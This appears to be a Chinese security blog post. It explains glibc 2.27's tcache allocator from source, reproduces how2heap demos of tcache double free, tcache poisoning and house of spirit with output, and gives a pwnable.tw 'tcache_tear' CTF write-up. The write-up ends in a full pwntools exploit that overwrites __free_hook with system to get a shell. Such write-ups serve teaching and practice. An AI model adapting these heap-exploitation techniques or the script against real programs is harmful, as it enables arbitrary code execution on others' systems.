从Glibc 2.26版本开始,新引入了一个tcache的技术,旨在提升内存分配的速度,但是提升速度的时候舍弃了很多检查,因此导致了很多新的安全问题.接下来以2.27版本的源码稍微分析一下.
#if USE_TCACHE /* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache. */ typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry;
tcache_entry用单向链表来链接Tcache结构,next指针指向下一个相同大小的chunk.与fast bin不同的是,next指向user data,而不是指向chunk的开头.
# define TCACHE_MAX_BINS 64 typedef struct tcache_perthread_struct { char counts[TCACHE_MAX_BINS]; tcache_entry *entries[TCACHE_MAX_BINS]; } tcache_perthread_struct;
tcache_perthread_struct是整个Tcache的管理结构.
counts用来记录entires中每一项当前链入的chunk数目,最多可以有七个chunk.
entires保存了64项tcache_entry,也就是说一个管理结构最多可以拥有64个tcache_entry.
/* Caller must ensure that we know tc_idx is valid and there's room for more chunks. */ static __always_inline void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); assert (tc_idx < TCACHE_MAX_BINS); e->next = tcache->entries[tc_idx]; tcache->entries[tc_idx] = e; ++(tcache->counts[tc_idx]); }
tcache_put函数首先把chunk的user data部分转化为一个tcache_entry *类型,然后插入到tcache->entries[tc_idx]的头部,然后把tcache->counts[tc_idx]加一,用来表示新增了一个chuank到结构体中.
/* Caller must ensure that we know tc_idx is valid and there's available chunks to remove. */ static __always_inline void * tcache_get (size_t tc_idx) { tcache_entry *e = tcache->entries[tc_idx]; assert (tc_idx < TCACHE_MAX_BINS); assert (tcache->entries[tc_idx] > 0); tcache->entries[tc_idx] = e->next; --(tcache->counts[tc_idx]); return (void *) e; }
tcache_get函数从结构体中取出一个tcache,将他以void *的形式返回,并且把tcache->counts[tc_idx]的值减一,用来表示结构体中少了一个chunk.
void * __libc_malloc (size_t bytes) { // 省略部分无关代码 #if USE_TCACHE /* int_free also calls request2size, be careful to not pad twice. */ size_t tbytes; checked_request2size (bytes, tbytes); size_t tc_idx = csize2tidx (tbytes); MAYBE_INIT_TCACHE (); DIAG_PUSH_NEEDS_COMMENT; if (tc_idx < mp_.tcache_bins /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */ && tcache && tcache->entries[tc_idx] != NULL) { return tcache_get (tc_idx); } DIAG_POP_NEEDS_COMMENT; #endif if (SINGLE_THREAD_P) { victim = _int_malloc (&main_arena, bytes); assert (!victim || chunk_is_mmapped (mem2chunk (victim)) || &main_arena == arena_for_chunk (mem2chunk (victim))); return victim; } arena_get (ar_ptr, bytes); victim = _int_malloc (ar_ptr, bytes);
首先根据传入的参数bytes计算所需chuank的实际大小,然后计算Tcache对应的下标tc_idx.
如果是第一次malloc的话,会调用MAYBE_INIT_TCACHE ()来对Tcache进行初始化.初始化之后,如果下标tc_idx没有越界,并且tcache->entries[tc_idx]不为空的话,就会调用tcache_get (tc_idx)来获取Tcache中的一块chunk.
上述条件不成立的话,程序才会进入常规的内存分配中,这里就可以看出Tcache的优先级非常高,比fast bin还要更早被分配.
static void tcache_init(void) { mstate ar_ptr; void *victim = 0; const size_t bytes = sizeof (tcache_perthread_struct); if (tcache_shutting_down) return; // 找到可用的 arena arena_get (ar_ptr, bytes); // 申请一个 sizeof(tcache_prethread_struct) 大小的 chunk victim = _int_malloc (ar_ptr, bytes); if (!victim && ar_ptr != NULL) { ar_ptr = arena_get_retry (ar_ptr, bytes); victim = _int_malloc (ar_ptr, bytes); } if (ar_ptr != NULL) __libc_lock_unlock (ar_ptr->mutex); /* In a low memory situation, we may not be able to allocate memory - in which case, we just keep trying later. However, we typically do this very early, so either there is sufficient memory, or there isn't enough memory to do non-trivial allocations anyway. */ // 初始化Tcache if (victim) { tcache = (tcache_perthread_struct *) victim; memset (tcache, 0, sizeof (tcache_perthread_struct)); } }
tcache_init()成功执行之后,tcache_perthread_struct就被成功建立了.
static void * _int_malloc (mstate av, size_t bytes) { if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ())) { idx = fastbin_index (nb); mfastbinptr *fb = &fastbin (av, idx); mchunkptr pp; victim = *fb; if (victim != NULL) { if (SINGLE_THREAD_P) *fb = victim->fd; else REMOVE_FB (fb, pp, victim); if (__glibc_likely (victim != NULL)) { size_t victim_idx = fastbin_index (chunksize (victim)); if (__builtin_expect (victim_idx != idx, 0)) malloc_printerr ("malloc(): memory corruption (fast)"); check_remalloced_chunk (av, victim, nb); #if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim; /* While bin not empty and tcache not full, copy chunks. */ while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = *fb) != NULL) { if (SINGLE_THREAD_P) *fb = tc_victim->fd; else { REMOVE_FB (fb, pp, tc_victim); if (__glibc_unlikely (tc_victim == NULL)) break; } tcache_put (tc_victim, tc_idx); } } #endif void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; } } }
在相应大小的fast bin找到chunk之后,就把chunk从fast bin中拿出来.然后把相应大小的fast bin中剩下的chunk全部加入Tcache,直到放满为止(也就是满七个为止).最后返回最开始那个满足条件的chunk.
如果fast bin不满足分配的话,接着进入small bin的分配:
if (in_smallbin_range (nb)) { idx = smallbin_index (nb); bin = bin_at (av, idx); if ((victim = last (bin)) != bin) { bck = victim->bk; if (__glibc_unlikely (bck->fd != victim)) malloc_printerr ("malloc(): smallbin double linked list corrupted"); set_inuse_bit_at_offset (victim, nb); bin->bk = bck; bck->fd = bin; if (av != &main_arena) set_non_main_arena (victim); check_malloced_chunk (av, victim, nb); #if USE_TCACHE /* While we're here, if we see other chunks of the same size, stash them in the tcache. */ size_t tc_idx = csize2tidx (nb); if (tcache && tc_idx < mp_.tcache_bins) { mchunkptr tc_victim; /* While bin not empty and tcache not full, copy chunks over. */ while (tcache->counts[tc_idx] < mp_.tcache_count && (tc_victim = last (bin)) != bin) { if (tc_victim != 0) { bck = tc_victim->bk; set_inuse_bit_at_offset (tc_victim, nb); if (av != &main_arena) set_non_main_arena (tc_victim); bin->bk = bck; bck->fd = bin; tcache_put (tc_victim, tc_idx); } } } #endif void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; } }
和fast bin基本一样.在相应大小的small bin找到chunk之后,就把chunk从small bin中拿出来.然后把相应大小的small bin中剩下的chunk全部加入Tcache,直到放满为止(也就是满七个为止).最后返回最开始那个满足条件的chunk.
如果small bin不满足分配的话,接着进入unsorted bin的分配:
int iters = 0; while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av)) { .................... .................... .................... /* remove from unsorted list */ unsorted_chunks (av)->bk = bck; bck->fd = unsorted_chunks (av); // 把 bin 从 unsorted bin 里面拿下来后,先放入 tcache #if USE_TCACHE // 如果unsorted bin 的大小正好,扔到 tcache ,然后继续遍历 We may return one of these chunks later. */ if (tcache_nb && tcache->counts[tc_idx] < mp_.tcache_count) { tcache_put (victim, tc_idx); return_cached = 1; continue; } else { #endif check_malloced_chunk (av, victim, nb); void *p = chunk2mem (victim); alloc_perturb (p, bytes); return p; #if USE_TCACHE } #endif } //大小不刚好等于需要的size 的话,就把 bin放到 相应的 bin 里面。 ....................................... ....................................... ....................................... #if USE_TCACHE //如果有 大小适配的 unsorted bin 进入了 tcache(return_cached=1) 同时 mp_.tcache_unsorted_limit > 0 默认为 0 ,不会进入分支, 继续遍历 ++tcache_unsorted_count; if (return_cached && mp_.tcache_unsorted_limit > 0 && tcache_unsorted_count > mp_.tcache_unsorted_limit) { return tcache_get (tc_idx); } #endif ....................................... ....................................... ....................................... } // end of while ((victim = unsorted_chunks (av)->b //遍历完 unsorted bin 后 ,根据 return_cached 判断 tcache 里面是否有合适的 chunk #if USE_TCACHE /* If all the small chunks we found ended up cached, return one now. */ if (return_cached) { return tcache_get (tc_idx); } #endif
在遍历unsorted bin的时候,如果有大小适配的chunk,不会立刻返回,而是将这个chunk加入Tcache,并且设置return_cached=1,表示Tcache此时已经有了符合大小的chunk.如果大小不是正好适配,那么就把chunk放到相应的bin中.
遍历完unsorted bin之后,根据return_cached的值来判断Tcache里面是否有符合大小的chunk,如果有的话直接调用tcache_get (tc_idx)并返回获得的chunk.如果没有的话则继续使用large bin或者top chunk来分配.
static void _int_free (mstate av, mchunkptr p, int have_lock) { ...... size = chunksize (p); check_inuse_chunk(av, p); #if USE_TCACHE { size_t tc_idx = csize2tidx (size); if (tcache && tc_idx < mp_.tcache_bins && tcache->counts[tc_idx] < mp_.tcache_count) { tcache_put (p, tc_idx); return; } } #endif
首先获取要释放的chunk的size,然后判断size是否符合规范,如果符合的话就看tcache->counts[tc_idx]有没有满,没满的话就直接放入Tcache,然后返回,
如果上述条件没有成立的话,就按照常规方法来释放chunk.
Tcache有64个bin数组,所以在64位的情况下,Tcache可以接受0×20~0×410大小的chunk.当我们分配这个范围内的chunk时,不会直接进入bin,而是在Tcache中分配内存,释放的时候也是同理,但是Tcache自身基本没什么检测,所以我们可以轻易实现好多在bin中很难进行的操作.
实验环境: Glibc 2.27 示例文件: how2heap(https://github.com/shellphish/how2heap)
Tcache在free的时候并不会修改in_use位,所以我们可以连续释放同一个chunk来造成Double free,这个比fast bin还不安全.
#include <stdio.h> #include <stdlib.h> int main() { fprintf(stderr, "This file demonstrates a simple double-free attack with tcache.\n"); fprintf(stderr, "Allocating buffer.\n"); int *a = malloc(8); fprintf(stderr, "malloc(8): %p\n", a); fprintf(stderr, "Freeing twice...\n"); free(a); free(a); fprintf(stderr, "Now the free list has [ %p, %p ].\n", a, a); fprintf(stderr, "Next allocated buffers will be same: [ %p, %p ].\n", malloc(8), malloc(8)); return 0; }
运行结果为:
This file demonstrates a simple double-free attack with tcache. Allocating buffer. malloc(8): 0x7fffd4adb260 Freeing twice... Now the free list has [ 0x7fffd4adb260, 0x7fffd4adb260 ]. Next allocated buffers will be same: [ 0x7fffd4adb260, 0x7fffd4adb260 ].
这个其实挺恐怖的,只要修改空闲Tcache的next指针,直接就能分配任意地址了.
#include <stdio.h> #include <stdlib.h> #include <stdint.h> int main() { // disable buffering setbuf(stdin, NULL); setbuf(stdout, NULL); printf("This file demonstrates a simple tcache poisoning attack by tricking malloc into\n" "returning a pointer to an arbitrary location (in this case, the stack).\n" "The attack is very similar to fastbin corruption attack.\n"); printf("After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f,\n" "We have to create and free one more chunk for padding before fd pointer hijacking.\n\n"); size_t stack_var; printf("The address we want malloc() to return is %p.\n", (char *)&stack_var); printf("Allocating 2 buffers.\n"); intptr_t *a = malloc(128); printf("malloc(128): %p\n", a); intptr_t *b = malloc(128); printf("malloc(128): %p\n", b); printf("Freeing the buffers...\n"); free(a); free(b); printf("Now the tcache list has [ %p -> %p ].\n", b, a); printf("We overwrite the first %lu bytes (fd/next pointer) of the data at %p\n" "to point to the location to control (%p).\n", sizeof(intptr_t), b, &stack_var); b[0] = (intptr_t)&stack_var; printf("Now the tcache list has [ %p -> %p ].\n", b, &stack_var); printf("1st malloc(128): %p\n", malloc(128)); printf("Now the tcache list has [ %p ].\n", &stack_var); intptr_t *c = malloc(128); printf("2nd malloc(128): %p\n", c); printf("We got the control\n"); return 0; }
运行结果为:
This file demonstrates a simple tcache poisoning attack by tricking malloc into returning a pointer to an arbitrary location (in this case, the stack). The attack is very similar to fastbin corruption attack. After the patch https://sourceware.org/git/?p=glibc.git;a=commit;h=77dc0d8643aa99c92bf671352b0a8adde705896f, We have to create and free one more chunk for padding before fd pointer hijacking. The address we want malloc() to return is 0x7fffff905088. Allocating 2 buffers. malloc(128): 0x7ffff76b0260 malloc(128): 0x7ffff76b02f0 Freeing the buffers... Now the tcache list has [ 0x7ffff76b02f0 -> 0x7ffff76b0260 ]. We overwrite the first 8 bytes (fd/next pointer) of the data at 0x7ffff76b02f0 to point to the location to control (0x7fffff905088). Now the tcache list has [ 0x7ffff76b02f0 -> 0x7fffff905088 ]. 1st malloc(128): 0x7ffff76b02f0 Now the tcache list has [ 0x7fffff905088 ]. 2nd malloc(128): 0x7fffff905088 We got the control
可以回顾一下tcache_get函数,拿chunk出来的时候并不检查地址是否合法,malloc分配的时候,也只是简单的判断了一下tcache->entries[tc_idx]是否为空.所以就造成了任意地址分配
比以前的house of spirit更简单了,只需伪造一个size区域,然后将伪造的fake chunk释放,再次malloc相应大小就可以得到fake_chunk.
#include <stdio.h> #include <stdlib.h> int main() { fprintf(stderr, "This file demonstrates the house of spirit attack on tcache.\n"); fprintf(stderr, "It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed.\n"); fprintf(stderr, "You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane.\n"); fprintf(stderr, "(Search for strings \"invalid next size\" and \"double free or corruption\")\n\n"); fprintf(stderr, "Ok. Let's start with the example!.\n\n"); fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n"); malloc(1); fprintf(stderr, "Let's imagine we will overwrite 1 pointer to point to a fake chunk region.\n"); unsigned long long *a; //pointer that will be overwritten unsigned long long fake_chunks[10]; //fake chunk region fprintf(stderr, "This region contains one fake chunk. It's size field is placed at %p\n", &fake_chunks[1]); fprintf(stderr, "This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n"); fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n"); fake_chunks[1] = 0x40; // this is the size fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]); fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n"); a = &fake_chunks[2]; fprintf(stderr, "Freeing the overwritten pointer.\n"); free(a); fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]); fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30)); }
运行结果:
This file demonstrates the house of spirit attack on tcache. It works in a similar way to original house of spirit but you don't need to create fake chunk after the fake chunk that will be freed. You can see this in malloc.c in function _int_free that tcache_put is called without checking if next chunk's size and prev_inuse are sane. (Search for strings "invalid next size" and "double free or corruption") Ok. Let's start with the example!. Calling malloc() once so that it sets up its memory. Let's imagine we will overwrite 1 pointer to point to a fake chunk region. This region contains one fake chunk. It's size field is placed at 0x7fffc4a14148 This chunk size has to be falling into the tcache category (chunk.size <= 0x410; malloc arg <= 0x408 on x64). The PREV_INUSE (lsb) bit is ignored by free for tcache chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems. ... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, 0x7fffc4a14148. ... note that the memory address of the *region* associated with this chunk must be 16-byte aligned. Freeing the overwritten pointer. Now the next malloc will return the region of our fake chunk at 0x7fffc4a14148, which will be 0x7fffc4a14150!
很轻松的实现了伪造chunk的分配.
[0] % checksec tcache_tear [*] '/home/dylan/ctfs/pwnable_tw/Teache_Tear/tcache_tear' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: No PIE FORTIFY: Enabled
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { __int64 choice; // rax unsigned int free_count; // [rsp+Ch] [rbp-4h] init_func(); printf("Name:", a2); read_func(&name_space, 0x20u); free_count = 0; while ( 1 ) { while ( 1 ) { menu(); choice = read_atol_func(); if ( choice != 2 ) break; if ( free_count <= 7 ) { free(ptr); // UAF ++free_count; } } if ( choice > 2 ) { if ( choice == 3 ) { show_func(); } else { if ( choice == 4 ) exit(0); LABEL_14: puts("Invalid choice"); } } else { if ( choice != 1 ) goto LABEL_14; add_func(); } } }
main函数很常规,要注意的有两点,用来存放我们姓名的name_space,还有就是题目的漏洞点,释放chunk的时候并没有将指针置0,导致了UAF.
int add_func() { unsigned __int64 size; // rax MAPDST printf("Size:"); size = read_atol_func(); if ( size <= 255 ) { ptr = malloc(size); printf("Data:"); read_func(ptr, size - 16); // didn't check size LODWORD(size) = puts("Done !"); } return size; }
申请chunk,并用ptr来保存mem指针.这里其实也有一个溢出的漏洞,但是并没有用到.
ssize_t show_func() { printf("Name :"); return write(1, &name_space, 0x20uLL); }
更短小了,打印name_space的内容,可以考虑信息泄露.
利用思路
exp
# -*- coding: utf-8 -*- from PwnContext.core import * local = True # Set up pwntools for the correct architecture exe = './' + 'tcache_tear' elf = context.binary = ELF(exe) #don't forget to change it host = '127.0.0.1' port = 10000 #don't forget to change it #ctx.binary = './' + 'tcache_tear' ctx.binary = exe libc = args.LIBC or 'libc.so' elf_libc=ELF(libc) ctx.debug_remote_libc = True ctx.remote_libc = libc if local: context.log_level = 'debug' try: io = ctx.start() except Exception as e: print(e.args) print("It can't work,may be it can't load the remote libc!") print("It will load the local process") io = process(exe) else: io = remote(host,port) #=========================================================== # EXPLOIT GOES HERE #=========================================================== # Arch: amd64-64-little # RELRO: Full RELRO # Stack: Canary found # NX: NX enabled # PIE: No PIE (0x400000) # FORTIFY: Enabled def add(size,content): io.recvuntil('Your choice :') io.sendline('1') io.recvuntil('Size:') io.sendline(str(size)) io.recvuntil('Data:') io.sendline(content) def free(): io.recvuntil('Your choice :') io.sendline('2') def show(): io.recvuntil('Your choice :') io.sendline('3') def dup_write(size,addr,content): add(size,'a') free() free() add(size,p64(addr)) add(size,'a') add(size,content) def exp(): # 在name_bss构造一个fake unsorted bin name_bss = 0x602060 name=p64(0)+p64(0x501) io.recvuntil('Name:') io.sendline(name) dup_write(0x50,name_bss+0x500,(p64(0)+p64(0x21)+p64(0)*2)*2) dup_write(0x60,name_bss+0x10,'a') free() # use unsorted bin chunk to leak libc show() io.recvuntil("Name :");io.recv(0x10) libc_addr = u64(io.recv(8)) - 0x3ebca0 free_hook = libc_addr + elf_libc.symbols['__free_hook'] system = libc_addr + elf_libc.symbols['system'] # use dup_write to modify __free_hook to system dup_write(0x70,free_hook,p64(system)) add(0x80,"$0\x00") # call free to getshell free() if __name__ == '__main__': exp() io.interactive()
blog:0x2l's Blog